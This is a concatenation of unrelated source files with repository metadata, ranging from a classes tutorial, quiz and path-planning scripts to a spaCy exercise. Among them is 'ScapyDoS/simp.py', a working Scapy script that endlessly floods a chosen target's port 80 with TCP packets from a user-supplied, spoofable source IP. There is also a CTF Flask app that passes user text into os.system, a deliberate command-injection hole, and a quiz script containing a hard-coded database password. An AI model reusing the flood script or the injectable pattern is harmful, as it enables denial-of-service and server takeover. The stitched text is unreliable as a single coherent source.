|
Geralonx/Classes_Tutorial
|
9499db8159efce1e3c38975b66a9c649631c6727
|
[
"MIT"
] | null | null | null |
# --- Class declaration with constructor --- #
class PC:
def __init__(self, cpu, gpu, ram):
self.cpu = cpu
self.gpu = gpu
self.__ram = ram
# --- Instantiating a class --- #
# --- I prefer initialization with keyword arguments --- #
pc_instanz = PC(cpu='Ryzen 7', gpu='RTX2070Super', ram='GSkill')
# --- Accessing normal _public_ attributes --- #
print(pc_instanz.cpu)
print(pc_instanz.gpu)
# --- Accessing a _private_ attribute --- #
# Commented out because it raises an AttributeError.
# print(pc_instanz.__ram)
# --- Accessing the instance dictionary to get that instance's contents. --- #
print(pc_instanz.__dict__)
# --- Accessing the actually _private_ attribute. --- #
print(pc_instanz._PC__ram)
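# This works because Python rewrites double-underscore attribute names to
# _ClassName__attr (name mangling); __ram is stored as _PC__ram, as the
# __dict__ output above shows.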
| 29.5 | 89 | 0.684485 |
5d66ef032fbd2dcf091b5ffde482a5d596613146
| 1,940 |
py
|
Python
|
bin/write2cly.py
|
docdiesel/smartmetertools
|
3b7449c7a9069696af078631aa5440f53d0f57bc
|
[
"MIT"
] | 1 |
2019-05-30T08:28:31.000Z
|
2019-05-30T08:28:31.000Z
|
bin/write2cly.py
|
docdiesel/smartmetertools
|
3b7449c7a9069696af078631aa5440f53d0f57bc
|
[
"MIT"
] | null | null | null |
bin/write2cly.py
|
docdiesel/smartmetertools
|
3b7449c7a9069696af078631aa5440f53d0f57bc
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
## write2cly.py - reads json (generated by sml_reader.py) from stdin
## - writes values to Corlysis time series InfluxDB
##
## Writes data from smart meter to time series database (InfluxDB)
## at Corlysis.com [1]. You need to configure your database and token
## in the config section.
##
## [1] https://corlysis.com/
##==== license section ========
## This code is under MIT License: Copyright (C) 2019 Bernd Künnen
## License details see https://choosealicense.com/licenses/mit/
##==== config section ========
# define corlysis settings here - set db and token at least
cly_base_url = 'https://corlysis.com:8086/write'
cly_parameters = {
"db": "energy",
"u" : "token",
"p" : "placeyourtokenhere",
"precision": "ms"}
# assign readable field names
config = {
"1.8.0": "Bezug",
"2.8.0": "Einspeisung",
"16.7.0": "Wirkleistung"
}
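# The code below assembles a single InfluxDB line-protocol record, e.g.
# (values are illustrative):
#   meter_data Bezug=1234.5,Einspeisung=42.0,Wirkleistung=350 1559212800000
# i.e. measurement name, comma-separated field set, timestamp in milliseconds.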
##==== code section ==== no need to change lines below ====
##-- import libraries
import json, sys, requests
import requests
import time
# load json from stdin
try:
    myjson = json.load(sys.stdin)
except ValueError:  # json.JSONDecodeError is a subclass of ValueError
    sys.stderr.write('!! error loading json')
    exit(1)
# decode json
try:
line = "meter_data "
# add each meter value to line
for obis in myjson['data']:
key = config[obis] # set human readable field name
value = myjson['data'][obis] # get value from smart meter
line += key + '=' + str(value) + ',' # add key=value to insert line
# cut off last comma
line = line[:-1]
# add timestamp as unix timestamp in ms
line += ' ' + str(int(time.time()*1000)) #+ '\n'
# post data into time series database; http response should be 204
r = requests.post(cly_base_url, params=cly_parameters, data=line)
    if r.status_code != 204 :
        sys.stderr.write(str(r.status_code))  # status_code is an int
        sys.stderr.write(r.text)              # .content is bytes; .text is str
# catch if input is no valid json
except:
sys.stderr.write('!!error: no data block in json')
exit(2)
| 25.526316 | 71 | 0.652062 |
53df3216d619040fc2551d1e35eda4fe2e177604
| 3,868 |
py
|
Python
|
WifiEnigma/BattleAI/question.py
|
Puzzlebox-IMT/Puzzlebox
|
6b80e22a4aee3228140692bd6352de18b2f6a96d
|
[
"MIT"
] | null | null | null |
WifiEnigma/BattleAI/question.py
|
Puzzlebox-IMT/Puzzlebox
|
6b80e22a4aee3228140692bd6352de18b2f6a96d
|
[
"MIT"
] | null | null | null |
WifiEnigma/BattleAI/question.py
|
Puzzlebox-IMT/Puzzlebox
|
6b80e22a4aee3228140692bd6352de18b2f6a96d
|
[
"MIT"
] | null | null | null |
import mysql.connector
import random
from voice import synthetize_voice, delete_wav
def AllQuestionAI(id_theme):
i = 0
    #CONNECT TO THE DATABASE
conn = mysql.connector.connect(host="localhost",
user="phpmyadmin", password="Vince@Mysql1997",
database="Puzzlebox")
cursor = conn.cursor()
    #EXECUTE THE QUERY AGAINST THE DATABASE
query = ("SELECT * FROM Question INNER JOIN themes_questions ON Question.ID_QUESTION = themes_questions.ID_QUESTION WHERE ID_THEME=%s")
cursor.execute(query, (id_theme, ))
    #FETCH THE RESULTS
rows = cursor.fetchall()
if rows:
for line in rows:
i += 1
enonce = line[1]
proposition1 = line[2]
proposition2 = line[3]
proposition3 = line[4]
proposition4 = line[5]
reponse = line[5]
print("*******************************************************************************")
print(" QUESTION ",i," ")
print("*******************************************************************************")
print("ENONCE : ", enonce)
print("PROPOSITION 1 : ", proposition1)
print("PROPOSITION 2 : ", proposition2)
print("PROPOSITION 3 : ", proposition3)
print("PROPOSITION 4 : ", proposition4)
print("REPONSE : ", reponse)
else:
print("Ce thème ne contient pas de questions")
def questionAI(id_theme):
i = 0
    #CONNECT TO THE DATABASE
conn = mysql.connector.connect(host="localhost",
user="phpmyadmin", password="Vince@Mysql1997",
database="Puzzlebox")
cursor = conn.cursor()
    #EXECUTE THE QUERY AGAINST THE DATABASE
query = ("SELECT * FROM Question INNER JOIN themes_questions ON Question.ID_QUESTION = themes_questions.ID_QUESTION WHERE ID_THEME=%s")
cursor.execute(query, (id_theme, ))
    #FETCH THE RESULTS
rows = cursor.fetchall()
if rows:
nb_rows = len(rows)
num_question = random.randint(1, nb_rows)
        #List indices start at zero, so shift the number down by one
num_question = num_question - 1
question = rows[num_question]
        result = [] #List which stores the query results
        #EXTRACT THE TUPLE FIELDS
result.append(question[1])
result.append(question[2])
result.append(question[3])
result.append(question[4])
result.append(question[5])
result.append(question[5]) #This last one is the answer
print("*******************************************************************************")
print(" QUESTION ",num_question+1," ")
print("*******************************************************************************")
print("ENONCE : ", result[0])
print("PROPOSITION 1 : ", result[1])
print("PROPOSITION 2 : ", result[2])
print("PROPOSITION 3 : ", result[3])
print("PROPOSITION 4 : ", result[4])
print("REPONSE : ", result[5])
#complete_question = ''.join(complete_question) #Convert tuple into string
return result
else:
print("Ce thème ne contient pas de questions")
def tell_question(question):
synthetize_voice(question[0])
for i in range(1,5) :
num_prop = "Proposition {} ".format(i)
num_prop = ''.join(num_prop)
line = ''.join(question[i])
line = num_prop + line
synthetize_voice(line)
delete_wav()
def quiz():
    counter = 1
    while counter <= 5:
        questionAI(1)
        counter += 1  # without this increment the loop never terminates
if (__name__ == '__main__'):
result = questionAI(1)
tell_question(result)
| 31.447154 | 140 | 0.520941 |
54e3b8446107d9bccd2d0bc314395d7a3117387b
| 7,069 |
py
|
Python
|
src/resources/clients/python_client/visitstate.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 226 |
2018-12-29T01:13:49.000Z
|
2022-03-30T19:16:31.000Z
|
src/resources/clients/python_client/visitstate.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 5,100 |
2019-01-14T18:19:25.000Z
|
2022-03-31T23:08:36.000Z
|
src/resources/clients/python_client/visitstate.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 84 |
2019-01-24T17:41:50.000Z
|
2022-03-10T10:01:46.000Z
|
import sys
class RPCType(object):
CloseRPC = 0
DetachRPC = 1
AddWindowRPC = 2
DeleteWindowRPC = 3
SetWindowLayoutRPC = 4
SetActiveWindowRPC = 5
ClearWindowRPC = 6
ClearAllWindowsRPC = 7
OpenDatabaseRPC = 8
CloseDatabaseRPC = 9
ActivateDatabaseRPC = 10
CheckForNewStatesRPC = 11
CreateDatabaseCorrelationRPC = 12
AlterDatabaseCorrelationRPC = 13
DeleteDatabaseCorrelationRPC = 14
ReOpenDatabaseRPC = 15
ReplaceDatabaseRPC = 16
OverlayDatabaseRPC = 17
OpenComputeEngineRPC = 18
CloseComputeEngineRPC = 19
AnimationSetNFramesRPC = 20
AnimationPlayRPC = 21
AnimationReversePlayRPC = 22
AnimationStopRPC = 23
TimeSliderNextStateRPC = 24
TimeSliderPreviousStateRPC = 25
SetTimeSliderStateRPC = 26
SetActiveTimeSliderRPC = 27
AddPlotRPC = 28
SetPlotFrameRangeRPC = 29
DeletePlotKeyframeRPC = 30
MovePlotKeyframeRPC = 31
DeleteActivePlotsRPC = 32
HideActivePlotsRPC = 33
DrawPlotsRPC = 34
DisableRedrawRPC = 35
RedrawRPC = 36
SetActivePlotsRPC = 37
ChangeActivePlotsVarRPC = 38
AddOperatorRPC = 39
AddInitializedOperatorRPC = 40
PromoteOperatorRPC = 41
DemoteOperatorRPC = 42
RemoveOperatorRPC = 43
RemoveLastOperatorRPC = 44
RemoveAllOperatorsRPC = 45
SaveWindowRPC = 46
SetDefaultPlotOptionsRPC = 47
SetPlotOptionsRPC = 48
SetDefaultOperatorOptionsRPC = 49
SetOperatorOptionsRPC = 50
WriteConfigFileRPC = 51
ConnectToMetaDataServerRPC = 52
IconifyAllWindowsRPC = 53
DeIconifyAllWindowsRPC = 54
ShowAllWindowsRPC = 55
HideAllWindowsRPC = 56
UpdateColorTableRPC = 57
SetAnnotationAttributesRPC = 58
SetDefaultAnnotationAttributesRPC = 59
ResetAnnotationAttributesRPC = 60
SetKeyframeAttributesRPC = 61
SetPlotSILRestrictionRPC = 62
SetViewAxisArrayRPC = 63
SetViewCurveRPC = 64
SetView2DRPC = 65
SetView3DRPC = 66
ResetPlotOptionsRPC = 67
ResetOperatorOptionsRPC = 68
SetAppearanceRPC = 69
ProcessExpressionsRPC = 70
SetLightListRPC = 71
SetDefaultLightListRPC = 72
ResetLightListRPC = 73
SetAnimationAttributesRPC = 74
SetWindowAreaRPC = 75
PrintWindowRPC = 76
ResetViewRPC = 77
RecenterViewRPC = 78
ToggleAllowPopupRPC = 79
ToggleMaintainViewModeRPC = 80
ToggleBoundingBoxModeRPC = 81
ToggleCameraViewModeRPC = 82
TogglePerspectiveViewRPC = 83
ToggleSpinModeRPC = 84
ToggleLockTimeRPC = 85
ToggleLockToolsRPC = 86
ToggleLockViewModeRPC = 87
ToggleFullFrameRPC = 88
UndoViewRPC = 89
RedoViewRPC = 90
InvertBackgroundRPC = 91
ClearPickPointsRPC = 92
SetWindowModeRPC = 93
EnableToolRPC = 94
SetToolUpdateModeRPC = 95
CopyViewToWindowRPC = 96
CopyLightingToWindowRPC = 97
CopyAnnotationsToWindowRPC = 98
CopyPlotsToWindowRPC = 99
ClearCacheRPC = 100
ClearCacheForAllEnginesRPC = 101
SetViewExtentsTypeRPC = 102
ClearRefLinesRPC = 103
SetRenderingAttributesRPC = 104
QueryRPC = 105
CloneWindowRPC = 106
SetMaterialAttributesRPC = 107
SetDefaultMaterialAttributesRPC = 108
ResetMaterialAttributesRPC = 109
SetPlotDatabaseStateRPC = 110
DeletePlotDatabaseKeyframeRPC = 111
MovePlotDatabaseKeyframeRPC = 112
ClearViewKeyframesRPC = 113
DeleteViewKeyframeRPC = 114
MoveViewKeyframeRPC = 115
SetViewKeyframeRPC = 116
OpenMDServerRPC = 117
EnableToolbarRPC = 118
HideToolbarsRPC = 119
HideToolbarsForAllWindowsRPC = 120
ShowToolbarsRPC = 121
ShowToolbarsForAllWindowsRPC = 122
SetToolbarIconSizeRPC = 123
SaveViewRPC = 124
SetGlobalLineoutAttributesRPC = 125
SetPickAttributesRPC = 126
ExportColorTableRPC = 127
ExportEntireStateRPC = 128
ImportEntireStateRPC = 129
ImportEntireStateWithDifferentSourcesRPC = 130
ResetPickAttributesRPC = 131
AddAnnotationObjectRPC = 132
HideActiveAnnotationObjectsRPC = 133
DeleteActiveAnnotationObjectsRPC = 134
RaiseActiveAnnotationObjectsRPC = 135
LowerActiveAnnotationObjectsRPC = 136
SetAnnotationObjectOptionsRPC = 137
SetDefaultAnnotationObjectListRPC = 138
ResetAnnotationObjectListRPC = 139
ResetPickLetterRPC = 140
SetDefaultPickAttributesRPC = 141
ChooseCenterOfRotationRPC = 142
SetCenterOfRotationRPC = 143
SetQueryOverTimeAttributesRPC = 144
SetDefaultQueryOverTimeAttributesRPC = 145
ResetQueryOverTimeAttributesRPC = 146
ResetLineoutColorRPC = 147
SetInteractorAttributesRPC = 148
SetDefaultInteractorAttributesRPC = 149
ResetInteractorAttributesRPC = 150
GetProcInfoRPC = 151
SendSimulationCommandRPC = 152
UpdateDBPluginInfoRPC = 153
ExportDBRPC = 154
SetTryHarderCyclesTimesRPC = 155
OpenClientRPC = 156
OpenGUIClientRPC = 157
OpenCLIClientRPC = 158
SuppressQueryOutputRPC = 159
SetQueryFloatFormatRPC = 160
SetMeshManagementAttributesRPC = 161
SetDefaultMeshManagementAttributesRPC = 162
ResetMeshManagementAttributesRPC = 163
ResizeWindowRPC = 164
MoveWindowRPC = 165
MoveAndResizeWindowRPC = 166
SetStateLoggingRPC = 167
ConstructDataBinningRPC = 168
RequestMetaDataRPC = 169
SetTreatAllDBsAsTimeVaryingRPC = 170
SetCreateMeshQualityExpressionsRPC = 171
SetCreateTimeDerivativeExpressionsRPC = 172
SetCreateVectorMagnitudeExpressionsRPC = 173
CopyActivePlotsRPC = 174
SetPlotFollowsTimeRPC = 175
TurnOffAllLocksRPC = 176
SetDefaultFileOpenOptionsRPC = 177
SetSuppressMessagesRPC = 178
ApplyNamedSelectionRPC = 179
CreateNamedSelectionRPC = 180
DeleteNamedSelectionRPC = 181
LoadNamedSelectionRPC = 182
SaveNamedSelectionRPC = 183
SetNamedSelectionAutoApplyRPC = 184
UpdateNamedSelectionRPC = 185
InitializeNamedSelectionVariablesRPC = 186
MenuQuitRPC = 187
SetPlotDescriptionRPC = 188
MovePlotOrderTowardFirstRPC = 189
MovePlotOrderTowardLastRPC = 190
SetPlotOrderToFirstRPC = 191
SetPlotOrderToLastRPC = 192
RenamePickLabelRPC = 193
GetQueryParametersRPC = 194
DDTConnectRPC = 195
DDTFocusRPC = 196
ReleaseToDDTRPC = 197
MaxRPC = 198
| 34.651961 | 54 | 0.660914 |
4ad523fc14942dd490ad41c526c6171f60967ac3
| 476 |
py
|
Python
|
Backend/models/risklayerPrognosis.py
|
dbvis-ukon/coronavis
|
f00374ac655c9d68541183d28ede6fe5536581dc
|
[
"Apache-2.0"
] | 15 |
2020-04-24T20:18:11.000Z
|
2022-01-31T21:05:05.000Z
|
Backend/models/risklayerPrognosis.py
|
dbvis-ukon/coronavis
|
f00374ac655c9d68541183d28ede6fe5536581dc
|
[
"Apache-2.0"
] | 2 |
2021-05-19T07:15:09.000Z
|
2022-03-07T08:29:34.000Z
|
Backend/models/risklayerPrognosis.py
|
dbvis-ukon/coronavis
|
f00374ac655c9d68541183d28ede6fe5536581dc
|
[
"Apache-2.0"
] | 4 |
2020-04-27T16:20:13.000Z
|
2021-02-23T10:39:42.000Z
|
from db import db
class RisklayerPrognosis(db.Model):
__tablename__ = 'risklayer_prognosis'
datenbestand = db.Column(db.TIMESTAMP, primary_key=True, nullable=False)
prognosis = db.Column(db.Float, nullable=False)
# class RisklayerPrognosisSchema(SQLAlchemyAutoSchema):
# class Meta:
# strict = True
# model = RisklayerPrognosis
#
# timestamp = fields.Timestamp(data_key="datenbestand")
# prognosis = fields.Number(data_key="prognosis")
| 28 | 76 | 0.72479 |
ab2add18b201d727e235b13fba3fa52b34c35680
| 404 |
py
|
Python
|
TreeModelLib/BelowgroundCompetition/__init__.py
|
jvollhueter/pyMANGA-1
|
414204a394d44405225b4b8224b19464c1006f1d
|
[
"MIT"
] | null | null | null |
TreeModelLib/BelowgroundCompetition/__init__.py
|
jvollhueter/pyMANGA-1
|
414204a394d44405225b4b8224b19464c1006f1d
|
[
"MIT"
] | null | null | null |
TreeModelLib/BelowgroundCompetition/__init__.py
|
jvollhueter/pyMANGA-1
|
414204a394d44405225b4b8224b19464c1006f1d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 8 15:25:03 2018
@author: bathmann
"""
from .BelowgroundCompetition import BelowgroundCompetition
from .SimpleTest import SimpleTest
from .FON import FON
from .OGSWithoutFeedback import OGSWithoutFeedback
from .OGSLargeScale3D import OGSLargeScale3D
from .OGS.helpers import CellInformation
from .FixedSalinity import FixedSalinity
| 25.25 | 58 | 0.799505 |
dbcc6f4ccb0dabce5252e1dd4108228b2c863f99
| 721 |
py
|
Python
|
web/web-lemonthinker/src/app/app.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | 2 |
2021-08-09T17:08:12.000Z
|
2021-08-09T17:08:17.000Z
|
web/web-lemonthinker/src/app/app.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | null | null | null |
web/web-lemonthinker/src/app/app.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | 1 |
2021-10-09T16:51:56.000Z
|
2021-10-09T16:51:56.000Z
|
from flask import Flask, request, redirect, url_for
import os
import random
import string
import time # lemonthink
clean = time.time()
app = Flask(__name__)
chars = list(string.ascii_letters + string.digits)
@app.route('/')
def main():
return open("index.html").read()
@app.route('/generate', methods=['POST'])
def upload():
global clean
if time.time() - clean > 60:
os.system("rm static/images/*")
clean = time.time()
text = request.form.getlist('text')[0]
text = text.replace("\"", "")
filename = "".join(random.choices(chars,k=8)) + ".png"
os.system(f"python3 generate.py {filename} \"{text}\"")
return redirect(url_for('static', filename='images/' + filename), code=301)
| 28.84 | 79 | 0.653259 |
91da549f96f9ccca48e20a796a48546be83febae
| 206 |
py
|
Python
|
exercises/ja/exc_03_16_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/ja/exc_03_16_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/ja/exc_03_16_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
import spacy
nlp = spacy.load("ja_core_news_sm")
text = (
"チックフィレイはジョージア州カレッジパークに本社を置く、"
"チキンサンドを専門とするアメリカのファストフードレストランチェーンです。"
)
# Tokenize only
doc = nlp(text)
print([token.text for token in doc])
| 17.166667 | 42 | 0.73301 |
f482d9773506167246440d9307b62395f61caa1a
| 2,353 |
py
|
Python
|
ais3-pre-exam-2022-writeup/Misc/JeetQode/chall/problems/astmath.py
|
Jimmy01240397/balsn-2021-writeup
|
91b71dfbddc1c214552280b12979a82ee1c3cb7e
|
[
"MIT"
] | null | null | null |
ais3-pre-exam-2022-writeup/Misc/JeetQode/chall/problems/astmath.py
|
Jimmy01240397/balsn-2021-writeup
|
91b71dfbddc1c214552280b12979a82ee1c3cb7e
|
[
"MIT"
] | null | null | null |
ais3-pre-exam-2022-writeup/Misc/JeetQode/chall/problems/astmath.py
|
Jimmy01240397/balsn-2021-writeup
|
91b71dfbddc1c214552280b12979a82ee1c3cb7e
|
[
"MIT"
] | null | null | null |
from problem import Problem
from typing import Any, Tuple
from random import randint
import ast
import json
def gen_num():
return str(randint(1, 9))
def gen_op():
return "+-*/"[randint(0, 3)]
def gen_expr(depth):
if randint(0, depth) == 0:
l = gen_expr(depth + 1)
r = gen_expr(depth + 1)
op = gen_op()
return f"({l}{op}{r})"
return f"({gen_num()})"
class ASTMath(Problem):
@property
def name(self) -> str:
return "AST Math"
@property
def desciption(self) -> str:
return """
Input: An AST of Python's arithmetic expression (only +,-,*,/)
Output: Result number
Examples:
Input: {"body": {"left": {"value": 1, "kind": null, "lineno": 1, "col_offset": 0, "end_lineno": 1, "end_col_offset": 1}, "op": "<_ast.Add object at 0x7f0387ccde20>", "right": {"value": 2, "kind": null, "lineno": 1, "col_offset": 2, "end_lineno": 1, "end_col_offset": 3}, "lineno": 1, "col_offset": 0, "end_lineno": 1, "end_col_offset": 3}}
Output: 3
Input: {"body": {"left": {"left": {"value": 8, "kind": null, "lineno": 1, "col_offset": 1, "end_lineno": 1, "end_col_offset": 2}, "op": "<_ast.Mult object at 0x7f20eb76aee0>", "right": {"value": 7, "kind": null, "lineno": 1, "col_offset": 3, "end_lineno": 1, "end_col_offset": 4}, "lineno": 1, "col_offset": 1, "end_lineno": 1, "end_col_offset": 4}, "op": "<_ast.Sub object at 0x7f20eb76ae80>", "right": {"left": {"value": 6, "kind": null, "lineno": 1, "col_offset": 7, "end_lineno": 1, "end_col_offset": 8}, "op": "<_ast.Mult object at 0x7f20eb76aee0>", "right": {"value": 3, "kind": null, "lineno": 1, "col_offset": 9, "end_lineno": 1, "end_col_offset": 10}, "lineno": 1, "col_offset": 7, "end_lineno": 1, "end_col_offset": 10}, "lineno": 1, "col_offset": 0, "end_lineno": 1, "end_col_offset": 11}}
Output: 38
"""
@property
def rounds(self) -> int:
return 10
def dumps(self, x):
return json.dumps(
x, default=lambda x: x.__dict__ if len(x.__dict__) else str(x)
)
def generate_testcase(self) -> Tuple[bool, Any]:
l = gen_expr(1)
r = gen_expr(1)
op = gen_op()
expr = f"{l}{op}{r}"
try:
result = eval(expr)
except ZeroDivisionError:
return self.generate_testcase()
return ast.parse(expr, mode="eval"), result
| 37.349206 | 800 | 0.592435 |
beaa8784fc43c71bc8bb5120744ac9a157c4e2a7
| 2,387 |
py
|
Python
|
PathPlanning/run.py
|
CandleStein/VAlg
|
43aecdd351954d316f132793cf069b70bf2e5cc2
|
[
"MIT"
] | null | null | null |
PathPlanning/run.py
|
CandleStein/VAlg
|
43aecdd351954d316f132793cf069b70bf2e5cc2
|
[
"MIT"
] | null | null | null |
PathPlanning/run.py
|
CandleStein/VAlg
|
43aecdd351954d316f132793cf069b70bf2e5cc2
|
[
"MIT"
] | 1 |
2020-09-25T18:31:34.000Z
|
2020-09-25T18:31:34.000Z
|
from planning_framework import path
import cv2 as cv
import numpy as np
import argparse
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(description="Path Planning Visualisation")
parser.add_argument(
"-n",
"--n_heuristic",
default=2,
help="Heuristic for A* Algorithm (default = 2). 0 for Dijkstra's Algorithm",
)
args = parser.parse_args()
N_H = int(args.n_heuristic)
drawing = False # true if mouse is pressed
mode = "obs" # if True, draw rectangle. Press 'm' to toggle to curve
ix, iy = -1, -1
sx, sy = 0, 0
dx, dy = 50, 50
# mouse callback function
def draw(event, x, y, flags, param):
global mode, sx, sy, dx, dy, drawing
if event == cv.EVENT_LBUTTONDOWN:
drawing = True
elif event == cv.EVENT_MOUSEMOVE:
        if drawing:
if mode == "obs":
cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
elif event == cv.EVENT_LBUTTONUP:
drawing = False
if mode == "obs":
cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
elif mode == "src":
cv.circle(img, (x, y), 5, (255, 0, 0), -1)
sx, sy = x, y
elif mode == "dst":
cv.circle(img, (x, y), 5, (0, 255, 0), -1)
dx, dy = x, y
img = np.zeros((512, 512, 3), np.uint8)
inv_im = np.ones(img.shape) * 255
cv.namedWindow("Draw the Occupancy Map")
cv.setMouseCallback("Draw the Occupancy Map", draw)
while 1:
cv.imshow("Draw the Occupancy Map", inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows()
mode = "src"
img_ = img
cv.namedWindow("Set the Starting Point")
cv.setMouseCallback("Set the Starting Point", draw)
while 1:
cv.imshow("Set the Starting Point", inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
# cv.waitKey(20)
cv.destroyAllWindows()
mode = "dst"
end = "Set the End Point"
cv.namedWindow(end)
cv.setMouseCallback(end, draw)
while cv.getWindowProperty(end, 0) >= 0:
cv.imshow(end, inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows()
img = cv.resize(img_, (50, 50), interpolation=cv.INTER_AREA)
inv_img = np.ones(img.shape)
np.savetxt("map.txt", np.array(img[:, :, 0]))
plt.imshow(inv_img - img)
start = np.array([sx, sy]) * 50 // 512
end = np.array([dx, dy]) * 50 // 512
path(start, end, N_H)
| 26.820225 | 86 | 0.607038 |
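run.py forwards -n/--n_heuristic into path() from planning_framework, which is not shown in this record; the flag's help text says 0 means Dijkstra. A hedged sketch of an order-n heuristic consistent with that contract (an assumption, not the project's actual implementation):

def heuristic(p, q, n):
    if n == 0:
        return 0.0  # zero heuristic degenerates A* into Dijkstra's algorithm
    dx, dy = abs(p[0] - q[0]), abs(p[1] - q[1])
    return (dx ** n + dy ** n) ** (1.0 / n)  # n=1 Manhattan, n=2 Euclidean

print(heuristic((0, 0), (3, 4), 2))  # 5.0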
fe7996f8bc015e9c1e0a7458bde9909f14df8fbf
| 316 |
py
|
Python
|
ScapyDoS-main/simp.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
ScapyDoS-main/simp.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
ScapyDoS-main/simp.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i = 1
while True:
    for srcport in range(1, 65535):
        ip = IP(src=src, dst=target)
        tcp = TCP(sport=srcport, dport=80)
        pkt = ip / tcp
        send(pkt, inter=.0001)
        print("Packet Sent ", i)
        i += 1
| 22.571429 | 42 | 0.550633 |
a3b8b5beaa0f8d8ecd98462fe75b978547dc1472
| 4,248 |
py
|
Python
|
Python X/Dictionaries in python.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
Python X/Dictionaries in python.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
Python X/Dictionaries in python.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
{
"cells": [
{
"cell_type": "code",
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
"# dictionaries, look-up tables & key-value pairs\n",
"# d = {} OR d = dict()\n",
"# e.g. d = {\"George\": 24, \"Tom\": 32}\n",
"\n",
"d = {}\n",
"\n"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {},
"outputs": [],
"source": [
"d[\"George\"] = 24"
]
},
{
"cell_type": "code",
"execution_count": 3,
"metadata": {},
"outputs": [],
"source": [
"d[\"Tom\"] = 32\n",
"d[\"Jenny\"] = 16"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"{'George': 24, 'Tom': 32, 'Jenny': 16}\n"
]
}
],
"source": [
"print(d)"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [
{
"ename": "NameError",
"evalue": "name 'Jenny' is not defined",
"output_type": "error",
"traceback": [
"\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
"\u001b[0;31mNameError\u001b[0m Traceback (most recent call last)",
"\u001b[0;32m<ipython-input-5-0bdfff196d23>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mprint\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0md\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0mJenny\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m",
"\u001b[0;31mNameError\u001b[0m: name 'Jenny' is not defined"
]
}
],
"source": [
"print(d[Jenny])"
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"32\n"
]
}
],
"source": [
"print(d[\"Tom\"])"
]
},
{
"cell_type": "code",
"execution_count": 7,
"metadata": {},
"outputs": [],
"source": [
"d[\"Jenny\"] = 20"
]
},
{
"cell_type": "code",
"execution_count": 8,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"20\n"
]
}
],
"source": [
"print(d[\"Jenny\"])"
]
},
{
"cell_type": "code",
"execution_count": 9,
"metadata": {},
"outputs": [],
"source": [
"# keys are strings or numbers \n",
"\n",
"d[10] = 100"
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"100\n"
]
}
],
"source": [
"print(d[10])"
]
},
{
"cell_type": "code",
"execution_count": 11,
"metadata": {},
"outputs": [],
"source": [
"# how to iterate over key-value pairs"
]
},
{
"cell_type": "code",
"execution_count": 13,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"key:\n",
"George\n",
